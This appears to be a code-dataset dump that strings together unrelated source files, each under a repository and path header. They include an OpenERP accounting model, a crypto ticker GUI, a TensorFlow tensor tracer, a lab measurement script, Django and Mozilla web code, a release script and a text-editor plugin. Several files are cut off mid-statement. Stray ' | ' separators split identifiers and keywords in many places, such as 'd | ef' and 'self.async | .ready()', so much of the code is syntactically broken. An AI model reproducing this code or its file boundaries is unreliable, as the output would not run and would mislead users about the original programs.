_description = "Payment Term Line"
_columns = {
'value': fields.selection([('procent', 'Percent'),
('balance', 'Balance'),
('fixed', 'Fixed Amount')], 'Computation',
required=True, help="""Select here the kind of valuation related to this payment term line. Note that you should have your last line with the type 'Balance' to ensure that the whole amount will be treated."""),
'value_amount': fields.float('Amount To Pay', digits_compute=dp.get_precision('Payment Term'), help="For percent enter a ratio between 0-1."),
'days': fields.integer('Number of Days', required=True, help="Number of days to add before computation of the day of month." \
"If Date=15/01, Number of Days=22, Day of Month=-1, then the due date is 28/02."),
'days2': fields.integer('Day of the Month', required=True, help="Day of the month, set -1 for the last day of the current month. If it's positive, it gives the day of the next month. Set 0 for net days (otherwise it's based on the beginning of the month)."),
'payment_id': fields.many2one('account.payment.term', 'Payment Term', required=True, select=True, ondelete='cascade'),
}
_defaults = {
'value': 'balance',
'days': 30,
'days2': 0,
}
_order = "value desc,days"
def _check_percent(self, cr, uid, ids, context=None):
obj = self.browse(cr, uid, ids[0], context=context)
if obj.value == 'procent' and ( obj.value_amount < 0.0 or obj.value_amount > 1.0):
return False
return True
_constraints = [
(_check_percent, 'Percentages for Payment Term Line must be between 0 and 1, Example: 0.02 for 2%.', ['value_amount']),
]
account_payment_term_line()
class account_account_type(osv.osv):
_name = "account.account.type"
_description = "Account Type"
def _get_financial_report_ref(self, cr, uid, context=None):
obj_data = self.pool.get('ir.model.data')
obj_financial_report = self.pool.get('account.financial.report')
financial_report_ref = {}
for key, financial_report in [
('asset','account_financial_report_assets0'),
('liability','account_financial_report_liability0'),
('income','account_financial_report_income0'),
('expense','account_financial_report_expense0'),
]:
try:
financial_report_ref[key] = obj_financial_report.browse(cr, uid,
obj_data.get_object_reference(cr, uid, 'account', financial_report)[1],
context | =context)
except ValueError:
pass
return financial_report_ref
d | ef _get_current_report_type(self, cr, uid, ids, name, arg, context=None):
res = {}
financial_report_ref = self._get_financial_report_ref(cr, uid, context=context)
for record in self.browse(cr, uid, ids, context=context):
res[record.id] = 'none'
for key, financial_report in financial_report_ref.items():
list_ids = [x.id for x in financial_report.account_type_ids]
if record.id in list_ids:
res[record.id] = key
return res
def _save_report_type(self, cr, uid, account_type_id, field_name, field_value, arg, context=None):
field_value = field_value or 'none'
obj_financial_report = self.pool.get('account.financial.report')
#unlink if it exists somewhere in the financial reports related to BS or PL
financial_report_ref = self._get_financial_report_ref(cr, uid, context=context)
for key, financial_report in financial_report_ref.items():
list_ids = [x.id for x in financial_report.account_type_ids]
if account_type_id in list_ids:
obj_financial_report.write(cr, uid, |
JevinJ/Bittrex-Notify | src/GUIfasttick.py | Python | mit | 3,213 | 0.002179 | import tkinter as tk
from time import sleep
from playsound import playsound
import config
import fasttick
from helpmessage import fasttick_help_message
import misc
from tickerwindow import TickerWindow
class GUIfasttick(TickerWindow):
def __init__(self, app):
super().__init__(app)
misc.delete_ancient_pickles('fasttick_history')
self.draw_labels()
self.draw_buttons()
self.draw_lists()
self.draw_timer()
self.timer_update()
def draw_labels(self):
self.labelName.grid(row=3, column=0, sticky='NSWE')
self.labelChange.config(text='Rate')
self.labelChange.grid(row=3, column=1, sticky='NSWE')
self.labelVol.grid(row=3, column=2, sticky='NSWE')
self.labelBuf.grid(row=3, rowspan=2, column=3, columnspan=2, sticky='NSWE')
def draw_buttons(self):
self.sortByName.grid(row=4, column=0, sticky='NSWE')
self.sortByChange.grid(row=4, column=1, sticky='NSWE')
self.sortByVol.grid(row=4, column=2, sticky='NSWE')
self.notifyBell.grid(row=4, column=3, sticky='NSWE')
self.help.grid(row=3, column=4, sticky='E')
def on_click_help(self):
helpWindow = tk.Toplevel()
helpWindow.title('Help')
frameBuf = tk.Frame(helpWindow, width=192, bg=config.MAIN_BG)
frameBuf.grid(row=0, rowspan=4, column=0, columnspan=3)
message = tk.Message(frameBuf, bg=config.MAIN_BG, fg=config.TEXT_COLOR,
width=192, text=fasttick_help_message)
message.grid(row=0, columnspan=3)
dismissButton = tk.Button(frameBuf, text='Dismiss', command=helpWindow.destroy)
dismissButton.grid(row=1, column=1)
def draw_lists(self):
self.yScroll.grid(row=5, column=3, sticky='NSWE')
self.listName.grid(row=5, column=0, sticky='NSWE')
self.listChange.grid(row=5, column=1, sticky='NSWE')
self.listVol.grid(row=5, column=2, sticky='NSWE')
def draw_timer(self):
self.timerLabel.grid(row=5, column=4, ipadx=8)
self.timerFrame.grid(row=5, column=4, columnspan=3)
self.timerDisp.grid(row=5, column=4)
self.timerValue = config.FASTTICK_RATE
|
def timer_update(self):
if self.timerValue == 3:
self.async = self.pool.apply_async(fasttick.heartbeat)
if self.timerValue == 0:
while True:
if self.async.ready():
break
for i in range(1, 4):
if self.async | .ready():
break
self.timerDisp.config(text=f'{"." * i}', font=('', 20))
self.app.update()
sleep(1)
self.ticker_data = self.async.get()
self.sort_ticker()
if self.notifyIsActive and self.ticker_data:
playsound('media/notification_sound.mp3')
self.timerValue = config.FASTTICK_RATE
values = divmod(self.timerValue, 60)
minutes = values[0]
seconds = values[1]
self.timerDisp.config(text=f'{minutes}:{seconds:0>2}', font=('', 20))
self.timerValue -= 1
self.app.after(1000, self.timer_update) |
kevin-coder/tensorflow-fork | tensorflow/python/tpu/tensor_tracer.py | Python | apache-2.0 | 67,356 | 0.007824 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
"""A utility to trace tensor values on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import os.path
import re
import sys
from tensorflow.python.fr | amework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_io
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import | array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu.ops import tpu_ops
_TRACER_LOG_PREFIX = ' [>>>TT>>>]'
_DEVICE_TYPE_TPU = 'tpu'
_DEVICE_TYPE_CPU = 'cpu'
_TRACE_MODE_NAN_INF = 'nan-inf'
_TRACE_MODE_PART_TENSOR = 'part-tensor'
_TRACE_MODE_PART_TENSOR_SIZE = 3
_TRACE_MODE_FULL_TENSOR = 'full-tensor'
_TRACE_MODE_NORM = 'norm'
_TRACE_MODE_MAX_ABS = 'max-abs'
_SUBMODE_BRIEF = 'brief'
_SUBMODE_DETAILED = 'detailed'
_REASON_OUTSIDE_OP_RANGE = 'not-traced-outside-op-range'
_REASON_UNSAFE_OP = 'not-traced-unsafe-op'
_REASON_WHILELOOP_OP = 'not-traced-special-whileloop-op'
_REASON_UNSAFE_SCALAR = 'not-traced-unsafe-scalar'
_REASON_SKIP_SCALAR = 'not-traced-scalar'
_REASON_LESS_INTERESTING_OP = 'not-traced-less-interesting-op'
_REASON_DEVICE_MISMATCH = 'not-traced-device-mismatch'
_REASON_DYNAMIC_SHAPE = 'not-traced-dynamic-shape'
_REASON_SCALAR_GET_TRACED = 'traced-scalar'
_REASON_TENSOR_GET_TRACED = 'traced-tensor'
_REASON_USER_INCLUDED = 'traced-user-included'
_REASON_USER_EXCLUDED = 'not-traced-user-excluded'
_REASON_NOT_EXECUTED = 'not-traced-not-in-exec-path'
_REASON_NON_NUMERIC_TENSOR = 'not-traced-non-numeric-tensor'
_REASON_FEEDS_WHILELOOP_OP = 'not-traced-feeds-special-whileloop-op'
_MARKER_SECTION_BEGIN = '!!!!!!! section-begin:'
_MARKER_SECTION_END = '!!!!!!! section-end:'
_SECTION_NAME_CONFIG = 'configuration'
_SECTION_NAME_REASON = 'reason'
_SECTION_NAME_OP_LIST = 'op-list'
_SECTION_NAME_TENSOR_LIST = 'tensor-list'
_SECTION_NAME_CACHE_INDEX_MAP = 'cache-index-map'
_SECTION_NAME_GRAPH = 'graph'
_FIELD_NAME_VERSION = 'version:'
_FIELD_NAME_DEVICE = 'device:'
_FIELD_NAME_TRACE_MODE = 'trace-mode:'
_FIELD_NAME_SUBMODE = 'submode:'
_FIELD_NAME_NUM_REPLICAS = 'num-replicas:'
_FIELD_NAME_NUM_REPLICAS_PER_HOST = 'num-replicas-per-host:'
_FIELD_NAME_NUM_HOSTS = 'num-hosts:'
_FIELD_NAME_NUM_OPS = 'number-of-ops:'
_FIELD_NAME_NUM_TENSORS = 'number-of-tensors:'
_FIELD_NAME_NUM_CACHE_INDICES = 'number-of-indices:'
_FIELD_NAME_TOPOLOGICAL_SORT_SUCCEED = 'topological-sort-succeed:'
_FLAGS_ENV_VAR = 'TENSOR_TRACER_FLAGS'
_FLAG_SINGLE_QUOTE_PAT = re.compile(r"\s*--([^=]+)='([^']*)'")
_FLAG_DOUBLE_QUOTE_PAT = re.compile(r'\s*--([^=]+)="([^"]*)"')
_FLAG_NO_QUOTE_PAT = re.compile(r'\s*--([^=]+)=(\S*)')
_FLAG_NO_EQUAL_PAT = re.compile(r'\s*--([^=]+)\s*')
_FLAG_NAME_ENABLE = 'enable'
_FLAG_NAME_TRACE_MODE = 'trace_mode'
_FLAG_NAME_USE_COMPACT_TRACE = 'compact_trace'
_FLAG_NAME_TRACE_SCALAR_OPS = 'trace_scalar'
_FLAG_NAME_TRACE_BEFORE_OPS = 'trace_before_included_ops'
_FLAG_NAME_TRACE_AFTER_OPS = 'trace_after_included_ops'
_FLAG_NAME_SUBMODE = 'submode'
_FLAG_NAME_INCLUDE_LESS_INTERESTING_OPS = 'include_less_interesting_ops'
_FLAG_NAME_EXCLUDED_OPNAMES = 'excluded_opnames'
_FLAG_NAME_EXCLUDED_OPTYPES = 'excluded_optypes'
_FLAG_NAME_INCLUDED_OPNAMES = 'included_opnames'
_FLAG_NAME_INCLUDED_OPTYPES = 'included_optypes'
_FLAG_NAME_TRACE_DIR = 'trace_dir'
_FLAG_NAME_REPORT_FILE = 'report_file'
_FLAG_NAME_USE_TEST_UNDECLARED_OUTPUTS_DIR = 'use_test_undeclared_outputs_dir'
_FLAG_NAME_OP_RANGE = 'op_range'
# Folder to dump the pre (before tensor tracer updates) and post graphs (after
# tensor tracer updates).
_FLAG_DUMP_BEFORE_AFTER_GRAPHS = 'dump_graphs'
_OP_RANGE_PAT = re.compile(r'(\d+):(\d+)')
_OUTPUT_STREAM_ESCAPE = 'file://'
_TEST_UNDECLARED_OUTPUTS_DIR_ENV_VAR = 'TEST_UNDECLARED_OUTPUTS_DIR'
_TENSOR_TRACER_COLLECTION = 'tensor_tracer_variables'
_TENSOR_TRACER_CHECKPOINT = 'tensor_tracer_checkpoint'
_TRACE_FILE_NAME = 'trace.all'
_COMPACT_TRACE_FILE_PREFIX = 'compact_trace.'
_COMPACT_TRACE_ENTRY_INIT_VALUE = -1.0
_TENSOR_TRACER_STORAGE = 'tensor_tracer_storage'
_TENSOR_VALUES_CACHE = 'tensor_values_cache'
_REPLICA_ID_TAG = '#replica-id: '
def tensor_tracepoint(tensor, checkpoint_name):
"""Adds a checkpoint with the given checkpoint name for the given tensor.
The tensor will be added to the list of tensors that will be traced by the
tensor tracer.
Args:
tensor: the tensor object for which the tracing is requested.
checkpoint_name: a string name for the checkpoint. This name has to be a
unique name if used within model comparison. The tensors that have the same
checkpoint identifier is compared in model comparison.
Returns:
The provided tensor.
"""
tensor.graph.get_collection(_TENSOR_TRACER_COLLECTION)
tensor.graph.add_to_collection(_TENSOR_TRACER_COLLECTION,
(tensor, checkpoint_name))
return tensor
def keras_layer_tracepoint(layer, checkpoint_name):
"""An interface for adding the tensor outputs of a keras layer.
Encapsulates tensor_tracepoint.
Args:
layer: A keras layer.
checkpoint_name: a string name for the checkpoint. This name has to be a
unique name if used within model comparison. The tensors that have the same
checkpoint identifier is compared in model comparison.
Returns:
The provided layer.
"""
try:
outputs = layer.output
if tensor_util.is_tensor(outputs):
tensor_tracepoint(outputs, '%s' % (checkpoint_name))
else:
idx = 0
for output_tensor in outputs:
if tensor_util.is_tensor(outputs):
tensor_tracepoint(output_tensor, '%s_%d' % (checkpoint_name, idx))
idx += 1
except AttributeError:
pass
except RuntimeError:
pass
return layer
def _trace_files_need_precreated(output_dir):
"""Return True if trace files must be pre-created by users."""
if not output_dir.startswith('/'):
return False
if len(output_dir) < 5:
return False
if output_dir[2] != 'n':
return False
if output_dir[3] != 's':
return False
if output_dir[1] != 'c':
return False
if output_dir[4] != '/':
return False
return True
def _get_tensor_values_cache(graph=None):
"""Returns the variable that implements tensor-value caching."""
graph = graph or ops.get_default_graph()
collection = graph.get_collection(_TENSOR_TRACER_STORAGE)
if len(collection) == 1:
return collection[0]
elif not collection:
raise RuntimeError('%s has not been created'%_TENSOR_VALUES_CACHE)
else:
raise RuntimeError('Multiple %s created'%_TENSOR_VALUES_CACHE)
return None
def _create_tensor_values_cache(graph, num_tensors):
"""Creates a variable as the cache to store intermediate tensor values."""
graph = graph or ops.get_default_graph()
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variab |
ColumbiaCMB/kid_readout | apps/data_taking_scripts/cooldown/2017-11-23_starcryo/r2h14_test.py | Python | bsd-2-clause | 3,665 | 0.003274 | """
Measure resonators, one at a time, with the readout tone centered in the filterbank bin.
"""
from __future__ import division
import time
import numpy as np
from kid_readout.roach import analog, calculate, hardware_tools, tools
from kid_readout.measurement import acquire, basic
from kid_readout.equipment import hardware, starcryo_temps
from equipment.srs import lockin
from equipment.custom import mmwave_source
from kid_readout.settings import LOCKIN_SERIAL_PORT
acquire.show_settings()
acquire.show_git_status()
import logging
logger = acquire.get_script_logger(__file__, level=logging.DEBUG)
# Parameters
suffix = 'test'
attenuations = [0]
f_center = 1e6 * np.array([3420.5])
fractional_frequency_shift = 0
f_center *= (1 + fractional_frequency_shift)
df_baseband_target = 60e3
f_sweep_span = 2e6 # The total span of the baseband tones
f_lo_spacing = 2.5e3 # This is the smallest resolution available
f_baseband_minimum = 100e6 # Keep the tones away from the LO by at least this frequency.
sweep_length_seconds = 0.01
# Hardware
temperature = starcryo_temps.Temperature()
lock = lockin.SR830(serial_device=LOCKIN_SERIAL_PORT)
lock.identification # This seems to be necessary to wake up the lockin
mmw = mmwave_source.MMWaveSource()
mmw.set_attenuator_ticks(0, 0)
mmw.multiplier_input = 'thermal'
mmw.ttl_modulation_source = "roach_2"
mmw.waveguide_twist_angle | = 0
conditioner = analog.HeterodyneMarkII()
hw = hardware.Hardware(temperature, lock, mmw, conditioner)
ri = hardware_tools.r2h14_with_mk2(initialize=True, use_config=False)
ri.set_modulation_output('high')
ri.iq_delay = -1
ri.adc_valon.set_ref_select(0) # internal
assert np.all(ri.adc_valon.get_phase_locks())
# Calculate sweep parameters, LO | and baseband sweep frequencies
ri_state = ri.state
tone_sample_exponent = int(np.round(np.log2(ri_state.adc_sample_rate / df_baseband_target)))
df_baseband = ri_state.adc_sample_rate / 2 ** tone_sample_exponent
num_sweep_tones = int(f_sweep_span / df_baseband)
f_baseband = f_baseband_minimum + ri.state.adc_sample_rate / 2 ** tone_sample_exponent * np.arange(num_sweep_tones)
f_lo_center = f_lo_spacing * np.round((f_center - f_baseband.mean()) / f_lo_spacing)
logger.info("Sweep using {:d} tones spanning {:.1f} MHz with resolution {:.0f} Hz (2^{:d} samples)".format(
num_sweep_tones, 1e-6 * f_baseband.ptp(), df_baseband, tone_sample_exponent))
# Run
npd = acquire.new_npy_directory(suffix=suffix)
tic = time.time()
try:
for lo_index, f_lo in enumerate(f_lo_center):
assert np.all(ri.adc_valon.get_phase_locks())
tools.set_and_attempt_external_phase_lock(ri=ri, f_lo=1e-6 * f_lo, f_lo_spacing=1e-6 * f_lo_spacing)
for attenuation_index, attenuation in enumerate(attenuations):
ri.set_dac_attenuator(attenuation)
ri.set_tone_baseband_freqs(freqs=1e-6 * np.array([f_baseband[0]]), nsamp=2 ** tone_sample_exponent)
time.sleep(1)
npd.write(ri.get_adc_measurement())
tools.optimize_fft_gain(ri, fraction_of_maximum=0.5)
state = hw.state()
state['lo_index'] = lo_index
state['attenuation_index'] = attenuation_index
sweep = acquire.run_sweep(ri=ri, tone_banks=1e-6 * (f_lo + f_baseband[:, np.newaxis]),
num_tone_samples=2 ** tone_sample_exponent, length_seconds=sweep_length_seconds,
state=state, verbose=True)[0]
npd.write(sweep)
finally:
ri.set_modulation_output('high')
npd.close()
print("Wrote {}".format(npd.root_path))
print("Elapsed time {:.0f} minutes.".format((time.time() - tic) / 60))
|
KarchinLab/2020plus | src/savedb/python/gene_features.py | Python | apache-2.0 | 4,824 | 0.001244 | """The gene_features module generates a DB table for features
like gene length and misc. features from the MutSigCV paper (fig s5).
The MutSigCV paper can be found here:
http://www.nature.com/nature/journal/v499/n7457/full/nature12213.html
The MutSigCV paper suggested that the background mutation rate for genes is important
for identifying statistically significant cancer genes. However, it is
not clear how important those features are for supervised learning on
"known" oncogenes and tsgs.
"""
import src.utils.python.util as _utils
import pandas as pd
import pandas.io.sql as psql
import sqlite3
import string
import os
import logging
logger = logging.getLogger(__name__)
def calc_gene_length(file_path):
"""Read in a FASTA file and calculate sequence length.
Assumes a typical one line header for a FASTA file.
**Parameters**
file_path : str
Path to FASTA file
**Returns**
seq_len : int
length of gene
"""
with open(file_path) as handle:
handle.readline() # skip FASTA header
seq = handle.read() # read file into single string
seq = seq.replace('\n', '') # remove line breaks
seq_len = len(seq)
return seq_len
def recursive_gene_length(fasta_dir):
"""Recursively scans the FASTA directory to calc gene lengths.
NOTE: assumes directories are ['0-9', 'A', .., 'Z']
**Parameters**
fasta_dir : str
path to fasta directory downloaded from COSMIC
**Returns**
gene_length_dict : dict
keys=gene name, values=gene length
"""
logger.info('Recursively calculating length in FASTA directories . . .')
gene_length_dict = {}
mydirs = ['0-9'] + list(string.ascii_uppercase)
for mydir in mydirs:
print(mydir)
dir_path = fasta_dir + mydir + '/'
for file_name in os.listdir(dir_path):
if '_protein' in file_name and '_ENST' not in file_name:
gene_name = file_name.strip('_protein.txt')
gene_length = calc_gene_length(dir_path + file_name)
gene_length_dict[gene_name] = gene_length
logger.info('Finished counting gene | length.')
return gene_length_dict
def save_db(df, genedb_path):
"""Saves the data into the gene_features table.
If the table already exists, the table is droped and then
re-inserted.
**Parameters**
df : pd.DataFrame
data to insert into DB table
genedb_path : str
path to sqlite db
"""
logger.debug('Dropping gene_features table IF EXISTS.')
_utils.drop_table('gene_features', genes_db_pa | th=genedb_path, kind='sqlite') # drop table if exists
logger.debug('After dropping gene_features table IF EXISTS.')
logger.info('Saving gene_features table ...')
conn = sqlite3.connect(genedb_path) # open connection
# save to sqlite3 database
psql.write_frame(df, # pandas dataframe
'gene_features', # table name
con=conn, # connection
flavor='sqlite', # use sqlite
if_exists='replace') # drop table if exists
conn.close()
logger.info('Finished saving gene_features table.')
def main(db_path):
# get config files
in_opts = _utils.get_input_config('input')
db_opts = _utils.get_db_config('2020plus')
# get absolute path for cosmic data
cosmic_path = os.path.join(_utils.proj_dir, in_opts['cosmic_path'])
# get data for gene_features table
logger.info('Processing features for gene_features table ...')
if os.path.isdir(cosmic_path):
gene_length = recursive_gene_length(in_opts['fasta_dir'])
genes, lengths = zip(*gene_length.items())
gene_length_df = pd.DataFrame({'gene': genes, 'gene length': lengths})
else:
gene_length_df = pd.read_csv(cosmic_path, sep='\t')
gene_length_df = gene_length_df[['Gene name', 'Gene CDS length']]
gene_length_df = gene_length_df.rename(columns={'Gene name': 'gene',
'Gene CDS length': 'gene length'})
gene_length_df.drop_duplicates(cols=['gene'], inplace=True)
# merge in data from mutsig and biogrid
mutsigcv_feature_path = os.path.join(_utils.proj_dir, in_opts['mutsigcv_features'])
df = pd.read_csv(mutsigcv_feature_path, sep='\t')
df = pd.merge(gene_length_df, df, how='left', on='gene') # merge the data frames
biogrid_path = os.path.join(_utils.proj_dir, 'data/biogrid_stats.txt')
biogrid_df = pd.read_csv(biogrid_path, sep='\t')
df = pd.merge(df, biogrid_df, how='left', on='gene')
# path to database
db_path = db_path if db_path else db_opts['db']
logger.info('Finished processing features for gene_features table.')
# save database
save_db(df, db_path)
|
kumar303/olympia | src/olympia/discovery/serializers.py | Python | bsd-3-clause | 2,792 | 0 | from rest_framework import serializers
from olympia.addons.models import Addon
from olympia.addons.serializers import AddonSerializer, VersionSerializer
from olympia.discovery.models import DiscoveryItem
from olympia.versions.models import Version
class DiscoveryEditorialContentSerializer(serializers.ModelSerializer):
"""
Serializer used to fetch editorial-content only, for internal use when
generating the .po files containing all editorial content to be translated
or for internal consumption by the TAAR team.
"""
addon = serializers.SerializerMethodField()
class Meta:
model = DiscoveryItem
# We only need fields that require a translation, that's custom_heading
| # and custom_description, plus a guid to identify the add-on.
fields = ('addon', 'custom_heading', 'custom_description')
def get_addon(self, obj):
return {
# Note: we select_related() the addon, so we don't have extra
# queries. But that also means the Addon transformers don't run!
# It's fine (and better for perf) as long as we don't need more
# complex fields.
'guid': obj.addon.guid,
}
class Di | scoveryVersionSerializer(VersionSerializer):
class Meta:
fields = ('id', 'compatibility', 'is_strict_compatibility_enabled',
'files',)
model = Version
class DiscoveryAddonSerializer(AddonSerializer):
current_version = DiscoveryVersionSerializer()
class Meta:
fields = ('id', 'authors', 'average_daily_users', 'current_version',
'guid', 'icon_url', 'name', 'previews', 'ratings', 'slug',
'theme_data', 'type', 'url',)
model = Addon
class DiscoverySerializer(serializers.ModelSerializer):
heading = serializers.CharField()
description = serializers.CharField()
heading_text = serializers.CharField()
description_text = serializers.CharField()
addon = DiscoveryAddonSerializer()
is_recommendation = serializers.SerializerMethodField()
class Meta:
fields = ('heading', 'description', 'heading_text', 'description_text',
'addon', 'is_recommendation')
model = DiscoveryItem
def get_is_recommendation(self, obj):
# If an object is ever returned without having a position set, that
# means it's coming from the recommendation server, it wasn't an
# editorial choice.
request = self.context.get('request')
if request and request.GET.get('edition') == 'china':
position_field = 'position_china'
else:
position_field = 'position'
position_value = getattr(obj, position_field)
return position_value is None or position_value < 1
|
tfeldmann/organize | manage.py | Python | mit | 5,445 | 0.001286 | import argparse
import getpass
import os
import re
import subprocess
from datetime import datetime
from pathlib import Path
import requests
SRC_FOLDER = "organize"
CURRENT_FOLDER = Path(__file__).resolve().parent
GITHUB_API_ENDPOINT = "https://api.github.com/repos/tfeldmann/organize"
def ask_confirm(text):
while True:
answer = input(f"{text} [y/n]: ").lower()
if answer in ("j", "y", "ja", "yes"):
return True
if answer in ("n", "no", "nein"):
return False
def set_version(args):
"""
- reads and validates version number
- updates __version__.py
- updates pyproject.toml
- Searches for 'WIP' in changelog and replaces it with current version and date
"""
from organize.__version__ import __version__ as current_version
print(f"Current version is {current_version}.")
# read version from input if not given
version = args.version
if not version:
version = input("Version number: ")
# validate and remove 'v' if present
version = version.lower()
if not re.match(r"v?\d+\.\d+.*", version):
return
if version.startswith("v"):
version = version[1:]
# safety check
if not a | sk_confirm(f"Creating version v{version}. Continue?"):
return
# update library version
versionfile = CURRENT_FOLDER / SRC_FOLDER / "__version__.py"
with open(versionfile, "w") as f:
print(f"Updating {versionfile}")
f.write(f'__version__ = "{version}"\n')
# update poetry version
| print("Updating pyproject.toml")
subprocess.run(["poetry", "version", version], check=True)
# read changelog
print("Updating CHANGELOG.md")
with open(CURRENT_FOLDER / "CHANGELOG.md", "r") as f:
changelog = f.read()
# check if WIP section is in changelog
wip_regex = re.compile(r"## WIP\n(.*?)(?=\n##)", re.MULTILINE | re.DOTALL)
match = wip_regex.search(changelog)
if not match:
print('No "## WIP" section found in changelog')
return
# change WIP to version number and date
changes = match.group(1)
today = datetime.now().strftime("%Y-%m-%d")
changelog = wip_regex.sub(f"## v{version} ({today})\n{changes}", changelog, count=1)
# write changelog
with open(CURRENT_FOLDER / "CHANGELOG.md", "w") as f:
f.write(changelog)
if ask_confirm("Commit changes?"):
subprocess.run(
["git", "add", "pyproject.toml", "*/__version__.py", "CHANGELOG.md"]
)
subprocess.run(["git", "commit", "-m", f"bump version to v{version}"])
print("Please push to github and wait for CI to pass.")
print("Success.")
def publish(args):
"""
- reads version
- reads changes from changelog
- creates git tag
- pushes to github
- publishes on pypi
- creates github release
"""
from organize.__version__ import __version__ as version
if not ask_confirm(f"Publishing version {version}. Is this correct?"):
return
if ask_confirm("Run the tests?"):
os.system("poetry run pytest")
os.system("poetry run mypy organize main.py")
# extract changes from changelog
with open(CURRENT_FOLDER / "CHANGELOG.md", "r") as f:
changelog = f.read()
wip_regex = re.compile(
"## v{}".format(version.replace(".", r"\.")) + r".*?\n(.*?)(?=\n##)",
re.MULTILINE | re.DOTALL,
)
match = wip_regex.search(changelog)
if not match:
print("Failed to extract changes from changelog. Do the versions match?")
return
changes = match.group(1).strip()
print(f"Changes:\n{changes}")
# create git tag ('vXXX')
if ask_confirm("Create tag?"):
subprocess.run(["git", "tag", "-a", f"v{version}", "-m", f"v{version}"])
# push to github
if ask_confirm("Push to github?"):
print("Pushing to github")
subprocess.run(["git", "push", "--follow-tags"], check=True)
# upload to pypi
if ask_confirm("Publish on Pypi?"):
subprocess.run(["rm", "-rf", "dist"], check=True)
subprocess.run(["poetry", "build"], check=True)
subprocess.run(["poetry", "publish"], check=True)
# create github release
if ask_confirm("Create github release?"):
response = requests.post(
f"{GITHUB_API_ENDPOINT}/releases",
auth=(input("Benutzer: "), getpass.getpass(prompt="API token: ")),
json={
"tag_name": f"v{version}",
"target_commitish": "main",
"name": f"v{version}",
"body": changes,
"draft": False,
"prerelease": False,
},
)
response.raise_for_status()
print("Success.")
def main():
assert CURRENT_FOLDER == Path.cwd().resolve()
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
parser_version = subparsers.add_parser("version", help="Set the version number")
parser_version.add_argument(
"version", type=str, help="The version number", nargs="?", default=None
)
parser_version.set_defaults(func=set_version)
parser_publish = subparsers.add_parser("publish", help="Publish the project")
parser_publish.set_defaults(func=publish)
args = parser.parse_args()
if not vars(args):
parser.print_help()
else:
args.func(args)
if __name__ == "__main__":
main()
|
Crowdcomputer/CC | general/urls.py | Python | apache-2.0 | 853 | 0.007034 | from django.conf.urls import patterns, url
from django.views.generic.base import TemplateView
from general import views
urlpatterns = patterns('',
url(r'^geoloc/updateloc/$', views.UpdateLoc, name='updateloc'),
url(r'^geoloc/$', views.GeoLoc | , name='geoloc'),
url(r'^geoloc/more$', views.AddGeoLoc, | name='addgeoloc'),
url(r'^create/$', views.CreateUser, name='register'),
url(r'^profile/$', views.ProfileView, name='profile'),
url(r'^login/$', views.Login, name='login'),
url(r'^apilogin/$', views.ApiLogin, name='apilogin'),
url(r'^logout/$', views.Logout, name='logout'),
url(r'^thanks/$', TemplateView.as_view(template_name='general/thanks.html'), name='thanks'),
# url(r'^$',redirect_to, {'url':reverse_lazy('e-list')}),
url(r'^$', TemplateView.as_view(template_name="general/home.html"), name='home'),
)
|
mate-desktop/pluma | plugins/externaltools/tools/functions.py | Python | gpl-2.0 | 10,724 | 0.004476 | # -*- coding: utf-8 -*-
# Pluma External Tools plugin
# Copyright (C) 2005-2006 Steve Frécinaux <steve@istique.net>
# Copyright (C) 2012-2021 MATE Developers
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
from gi.repository import Gio, Gdk, Gtk, GtkSource, Pluma
from .outputpanel import OutputPanel
from .capture import *
def default(val, d):
if val is not None:
return val
else:
return d
def current_word(document):
piter = document.get_iter_at_mark(document.get_insert())
start = piter.copy()
if not piter.starts_word() and (piter.inside_word() or piter.ends_word()):
start.backward_word_start()
if not piter.ends_word() and piter.inside_word():
piter.forward_word_end()
return (start, piter)
# ==== Capture related functions ====
def run_external_tool(window, panel, node):
# Configure capture environment
try:
cwd = os.getcwd()
except OSError:
cwd = os.getenv('HOME');
capture = Capture(node.command, cwd)
capture.env = os.environ.copy()
capture.set_env(PLUMA_CWD = cwd)
view = window.get_active_view()
if view is not None:
# Environment vars relative to current document
document = view.get_buffer()
uri = document.get_uri()
# Current line number
piter = document.get_iter_at_mark(document.get_insert())
capture.set_env(PLUMA_CURRENT_LINE_NUMBER=str(piter.get_line() + 1))
# Current line text
piter.set_line_offset(0)
end = piter.copy()
if not end.ends_line():
end.forward_to_line_end()
capture.set_env(PLUMA_CURRENT_LINE=piter.get_text(end))
# Selected text (only if input is not selection)
if node.input != 'selection' and node.input != 'selection-document':
bounds = document.get_selection_bounds()
if bounds:
capture.set_env(PLUMA_SELECTED_TEXT=bounds[0].get_text(bounds[1]))
bounds = current_word(document)
capture.set_env(PLUMA_CURRENT_WORD=bounds[0].get_text(bounds[1]))
capture.set_env(PLUMA_CURRENT_DOCUMENT_TYPE=document.get_mime_type())
if uri is not None:
gfile = Gio.file_new_for_uri(uri)
scheme = gfile.get_uri_scheme()
name = os.path.basename(uri)
